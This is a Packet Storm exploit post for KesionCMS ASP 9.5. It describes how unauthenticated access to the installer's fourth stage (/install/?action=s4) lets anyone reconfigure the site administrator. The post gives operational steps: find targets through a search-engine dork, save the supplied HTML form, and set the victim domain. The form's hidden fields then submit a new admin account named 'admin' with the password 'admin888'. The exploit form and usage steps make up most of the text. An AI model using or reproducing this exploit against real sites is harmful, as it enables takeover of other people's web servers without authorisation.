

KesionCMS ASP 9.5 Add Administrator

KesionCMS ASP version 9.5 suffers from an add administrator vulnerability.

Packet Storm

| # Title : KesionCMS ASP v9.5 Reinstall Add Admin Exploit |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) |
| # Vendor : |
| # Dork : Powered by KesionCMS |

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] copy & past this exploit listed below into a text file and save it with “.html” extension

[+] at Line 09 & 16 change the domain name of target .

[+] The infected folder is /install/
This is due to direct unauthorized access to the fourth stage (?action=s4)of the script installation
The fourth stage (?action=s4)is responsible for configuring the setting of the site administrator.
For this, the vulnerability can be exploited through the direct link or using the exploitation written below

[+] Exploit

        Hacked By indoushka  
    </title><link href="" rel="stylesheet" />  
    <script src="" type="text/javascript"></script>  
<script src="" type="text/javascript"></script>  
<script src=""></script>  

<form name="form" method="post" action="" id="form">
<div class="guide">
<div class="guidetitle">
<div class="clear"></div>
<div class="clear"></div>
<input type="hidden" name="action" value="" />
<input type="hidden" name="DBlx" value="" />
<input type="hidden" name="CkbData" value="" />

          <input type="hidden" name="TxtDBName_a" value=""  />  
   <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
   <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
   <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
   <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

  <div id="">

 <div class="clear"></div>  
 <div class="sjlist">  
    <li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li>  
    <li><span>网站域名:</span><input name="TxtSiteUrl" value="" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
    <li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
    <li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
    <li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li>  
            <li><span> 后台登录验证码:</span>  
             <input type="radio" name="isCode_a" value="True"  /> 启用    
             <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  

             <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
            <font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
  <div class="clear"></div>  
    <li><span>管理员账号:</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
    <li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
    <li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
  <div class="clear blank10"></div>

        <div style="padding:5px">  
  <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  

Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution